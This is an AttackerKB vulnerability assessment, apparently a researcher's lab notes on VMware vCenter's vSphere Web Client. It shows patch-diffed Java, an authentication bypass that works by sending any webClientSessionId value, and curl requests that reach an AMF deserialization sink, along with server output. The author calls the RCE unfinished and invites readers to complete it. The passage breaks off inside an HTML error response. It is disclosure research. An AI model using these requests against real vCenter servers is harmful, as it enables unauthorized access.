Unknown
CVE-2021-21980
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2021-21980
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.
Add Assessment
Technical Analysis
The Long Tail of CVE-2017-5641
This is not CVE-2021-21980 or CVE-2021-22049 but rather a curious case of AMF deserialization that was patched against auth bypass in the same update. My notes are as follows. RCE is incomplete, but maybe you can finish it!
Analyzing the patch and discovering the auth bypass
public void doFilter(ServletRequest paramServletRequest, ServletResponse paramServletResponse, FilterChain paramFilterChain) throws IOException, ServletException { @@ -90,13 +122,11 @@ public class SessionManagementFilter implements Filter { SessionUtil.setHttpRequest(httpServletRequest); addHstsHeader(httpServletRequest, httpServletResponse); String str = httpServletRequest.getRequestURI(); - boolean bool = str.endsWith("download/logs"); - if (this._clientIdSecurityEnabled && bool) { - boolean bool1 = validateClientId(httpServletRequest, httpServletResponse); - if (!bool1) { - httpServletResponse.setStatus(401); - return; - } + if (this._authenticationProtectionEnabled && + !isSessionAuthenticated(httpServletRequest.getSession()) && !SessionUtil.isRequestWithValidSessionIndexCookie(httpServletRequest)) { + _logger.warn("Rejecting request for URI: " + str + " without a valid client id!"); + httpServletResponse.setStatus(401); + return; } if (this._isH5Client || str.endsWith(".html")) { HttpSession httpSession = httpServletRequest.getSession(true);
private boolean validateClientId(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) { String str1 = SessionUtil.getClientId(paramHttpServletRequest.getSession()); String str2 = extractClientId(paramHttpServletRequest); return (str1 != null || str2 != null); }
private String extractClientId(HttpServletRequest paramHttpServletRequest) { String str = paramHttpServletRequest.getHeader("webClientSessionId"); if (str == null) str = paramHttpServletRequest.getParameter("webClientSessionId"); return str; }
Testing a GET
request without the webClientSessionId
parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > GET /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 401 < Set-Cookie: JSESSIONID=87EF28C1FB437E91D3A46739E6FC1774; Path=/vsphere-client; Secure; HttpOnly < Content-Length: 0 < Date: Sat, 04 Dec 2021 00:57:08 GMT < Server: Anonymous < * Connection #0 to host 172.16.57.237 left intact wvu@kharak:~$
Testing a GET
request with the webClientSessionId
parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs?webClientSessionId=nope * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > GET /vsphere-client/download/logs?webClientSessionId=nope HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 405 < Set-Cookie: JSESSIONID=3DDE7D387076B9E7814A940DACA2B6B4; Path=/vsphere-client; Secure; HttpOnly; SameSite=None < Allow: POST < Cache-Control: no-cache, no-store, max-age=0, must-revalidate < Pragma: no-cache < Expires: 0 < Strict-Transport-Security: max-age=31536000 ; includeSubDomains < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < X-Content-Type-Options: nosniff < Content-Type: text/html;charset=utf-8 < Content-Language: en < Content-Length: 749 < Date: Sat, 04 Dec 2021 00:57:46 GMT < Server: Anonymous < * Connection #0 to host 172.16.57.237 left intact <!doctype html><html lang="en"><head><title>HTTP Status 405 – Method Not Allowed</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 405 – Method Not Allowed</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> Request method 'GET' not supported</p><p><b>Description</b> The method received in the request-line is known by the origin server but not supported by the target resource.</p><hr class="line" /><h3>Apache Tomcat/8.5.61</h3></body></html>wvu@kharak:~$
[2021-12-04T00:57:46.537Z] [WARN ] http-nio-9090-exec-2 70000066 ###### ###### o.s.web.servlet.mvc.support.DefaultHandlerExceptionResolver Resolved exception caused by handler execution: org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'GET' not supported
Testing a POST
request with the webClientSessionId
parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d webClientSessionId=nope * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > POST /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > Content-Length: 23 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 200 < Set-Cookie: JSESSIONID=950054453E83C0E133D9048BD60EEB61; Path=/vsphere-client; Secure; HttpOnly < Cache-Control: no-cache, no-store, max-age=0, must-revalidate < Pragma: no-cache < Expires: 0 < Strict-Transport-Security: max-age=31536000 ; includeSubDomains < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < X-Content-Type-Options: nosniff < Content-Length: 0 < Date: Sat, 04 Dec 2021 00:58:47 GMT < Server: Anonymous < * Connection #0 to host 172.16.57.237 left intact wvu@kharak:~$
[2021-12-04T00:58:47.452Z] [WARN ] http-nio-9090-exec-5 70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null. [2021-12-04T00:58:47.452Z] [ERROR] http-nio-9090-exec-5 70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController There is no spec for downloading logs in the request.
Analyzing the DownloadLogController
class and discovering AMF deserialization
@RequestMapping(method = {RequestMethod.POST}) public void downloadLogBundles(final HttpServletRequest request, final HttpServletResponse response) throws IOException, Exception { final DownloadingLogsTask downloadingLogsTask; final HttpSession session = request.getSession(); Map<String, String[]> map = request.getParameterMap(); final String clientId = SessionUtil.getClientId(httpSession); if (str == null) _logger.warn("ClientId is null."); final SelectedLogsSpec selectedLogsSpec = processSelectedLogsSpecParameter(map); final Collection<LogBundleDownloadSpec> logBundleDownloadSpecs = processLogBundleDownloadSpecs(map); if (selectedLogsSpec == null && collection == null) { _logger.error("There is no spec for downloading logs in the request."); return; } ManagedObjectReference managedObjectReference = DownloadingLogsTask.findTaskTarget(selectedLogsSpec, collection); if (managedObjectReference != null) { int i = extractFileIdParam(map); downloadingLogsTask = new DownloadingLogsTask(str, managedObjectReference, i, this._queryExecutor, this._taskRegistry); } else { downloadingLogsTask = null; } try { final ZipOutputStream zipStream = new ZipOutputStream((OutputStream)response.getOutputStream()); Runnable runnable = new Runnable() { public void run() { try { SessionUtil.setHttpRequest(request); SessionUtil.setHttpSession(session); response.setContentType("application/zip"); if (selectedLogsSpec == null) { KeyStore keyStore = DownloadLogController.this._keystoreService.getKeyStore(); Map map = DownloadLogController.this.parseParameters(logBundleDownloadSpecs, clientId, keyStore); DownloadLogController.this.writeZipFile(map, zipStream, clientId, downloadingLogsTask); } else { if (selectedLogsSpec.vCenterLogsIncluded) { ManagedObjectReference managedObjectReference = DownloadLogController.this.invokeGenerateLogBundlesTask(selectedLogsSpec.targetObjectReference, clientId); DownloadLogController.this.writeVcLogsToStream(zipStream, managedObjectReference, selectedLogsSpec, clientId, downloadingLogsTask); DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask); } else { DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask); } zipStream.finish(); } if (downloadingLogsTask != null) downloadingLogsTask.updateState(TaskState.SUCCESS, null); } catch (InterruptedException interruptedException) { DownloadLogController._logger.info("Downloading logs task thread was interrupted."); Thread.currentThread().interrupt(); } catch (WriteIOException writeIOException) { if (downloadingLogsTask != null) { DownloadLogController._logger.info("Downloading logs is cancelled."); DownloadLogController._logger.debug("Exception in downloading logs: ", writeIOException); downloadingLogsTask.updateState(TaskState.CANCELED, null); } } catch (Exception exception) { DownloadLogController._logger.error("Error downloading logs.", exception); if (downloadingLogsTask != null) { TaskState taskState = downloadingLogsTask.getState(); if (!TaskState.CANCELED.equals(taskState)) downloadingLogsTask.updateState(TaskState.ERROR, exception); } } } }; FutureTask futureTask = new FutureTask(runnable, null); if (downloadingLogsTask != null) TaskUtil.addClientTaskKeyFutureCloseablePair(downloadingLogsTask .getKey(), futureTask, zipOutputStream); try { ExecutorUtil.executeTasks( Collections.singleton(futureTask), this._executor); } catch (InterruptedException interruptedException) {} if (downloadingLogsTask != null) TaskUtil.removeClientTaskKeyFromMap(downloadingLogsTask.getKey()); } catch (Exception exception) { if (downloadingLogsTask != null && TaskState.RUNNING == (downloadingLogsTask.getClientTaskInfo()).state) downloadingLogsTask.updateState(TaskState.ERROR, exception); throw exception; } }
private SelectedLogsSpec processSelectedLogsSpecParameter(Map<String, String[]> paramMap) throws IOException { String[] arrayOfString = paramMap.get("SelectedLogsSpec"); if (ArrayUtil.isNullOrEmpty((Object[])arrayOfString)) return null; return parseSelectedLogsSpec(arrayOfString[0]); }
private static SelectedLogsSpec parseSelectedLogsSpec(String paramString) throws IOException { Base64.Decoder decoder = new Base64.Decoder(); decoder.decode(paramString); byte[] arrayOfByte = decoder.flush(); ClassLoader classLoader1 = TypeMarshallingContext.getTypeMarshallingContext().getClassLoader(); ClassLoader classLoader2 = SelectedLogsSpec.class.getClassLoader(); Amf3Input amf3Input = new Amf3Input(getAmfSerializationContext(classLoader2)); amf3Input.setInputStream(new ByteArrayInputStream(arrayOfByte)); SelectedLogsSpec selectedLogsSpec = null; try { while (amf3Input.available() > 0) { Object object = amf3Input.readObject(); if (object instanceof SelectedLogsSpec) { selectedLogsSpec = (SelectedLogsSpec)object; } else if (object instanceof Object[]) { for (Object object1 : (Object[])object) { if (object1 instanceof SelectedLogsSpec) { selectedLogsSpec = (SelectedLogsSpec)object1; break; } } } else if (object instanceof Map) { for (SelectedLogsSpec selectedLogsSpec1 : ((Map)object).values()) { if (selectedLogsSpec1 instanceof SelectedLogsSpec) { selectedLogsSpec = selectedLogsSpec1; break; } } } if (selectedLogsSpec != null) break; } } catch (ClassNotFoundException classNotFoundException) { _logger.warn("The AMF deserialization fails.", classNotFoundException); } finally { amf3Input.close(); TypeMarshallingContext.getTypeMarshallingContext() .setClassLoader(classLoader1); } return selectedLogsSpec; }
Testing AMF deserialization using a bogus string
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=lol" * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > POST /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > Content-Length: 44 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 500 < Set-Cookie: JSESSIONID=587387E51FA794E6CE03FB9DBB454777; Path=/vsphere-client; Secure; HttpOnly < Cache-Control: no-cache, no-store, max-age=0, must-revalidate < Pragma: no-cache < Expires: 0 < Strict-Transport-Security: max-age=31536000 ; includeSubDomains < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < X-Content-Type-Options: nosniff < Content-Type: text/html;charset=utf-8 < Content-Length: 2977 < Date: Sat, 04 Dec 2021 01:02:05 GMT < Connection: close < Server: Anonymous < <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- saved from url=(0014)about:internet --> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css" media="screen"> html { background: #3075ab; /* Old browsers */ background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* IE10+ */ background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */ background-repeat: no-repeat; height: 100%; overflow: auto; margin: 0; padding: 0; } #errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; } #errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; } #errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; } #errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; } #errorSorry { font-weight: bold; } #errorMessage { padding-top: 10px; padding-bottom: 10px; } #errorCheckLog { font-style: italic; } </style> </head> <body> <div id="errorAreaWrapper"> <div id="errorArea"> <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div> <div id="errorAllText"> <div id="errorSorry">A server error occurred.</div> <div id="errorMessage">a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!</div> <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div> </div> </div> </div> </body> </html> * Closing connection 0 * TLSv1.2 (OUT), TLS alert, close notify (256): wvu@kharak:~$
[2021-12-04T01:02:05.830Z] [WARN ] http-nio-9090-exec-8 70000068 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null. [2021-12-04T01:02:05.831Z] [ERROR] http-nio-9090-exec-8 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!] with root cause java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated! at flex.messaging.util.Base64$Decoder.flush(Base64.java:136) at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:732) at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584) at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201) at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970) at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872) at javax.servlet.http.HttpServlet.service(HttpServlet.java:661) at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846) at javax.servlet.http.HttpServlet.service(HttpServlet.java:742) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214) at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177) at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347) at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81) at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764) at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33) at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
Testing AMF deserialization using a Base64-encoded string
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=QQ==" * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > POST /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > Content-Length: 45 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 500 < Set-Cookie: JSESSIONID=1488241428F4AE1E7A8175ACAD6A276F; Path=/vsphere-client; Secure; HttpOnly < Cache-Control: no-cache, no-store, max-age=0, must-revalidate < Pragma: no-cache < Expires: 0 < Strict-Transport-Security: max-age=31536000 ; includeSubDomains < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < X-Content-Type-Options: nosniff < Content-Type: text/html;charset=utf-8 < Content-Length: 2920 < Date: Sat, 04 Dec 2021 01:02:59 GMT < Connection: close < Server: Anonymous < <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- saved from url=(0014)about:internet --> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css" media="screen"> html { background: #3075ab; /* Old browsers */ background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 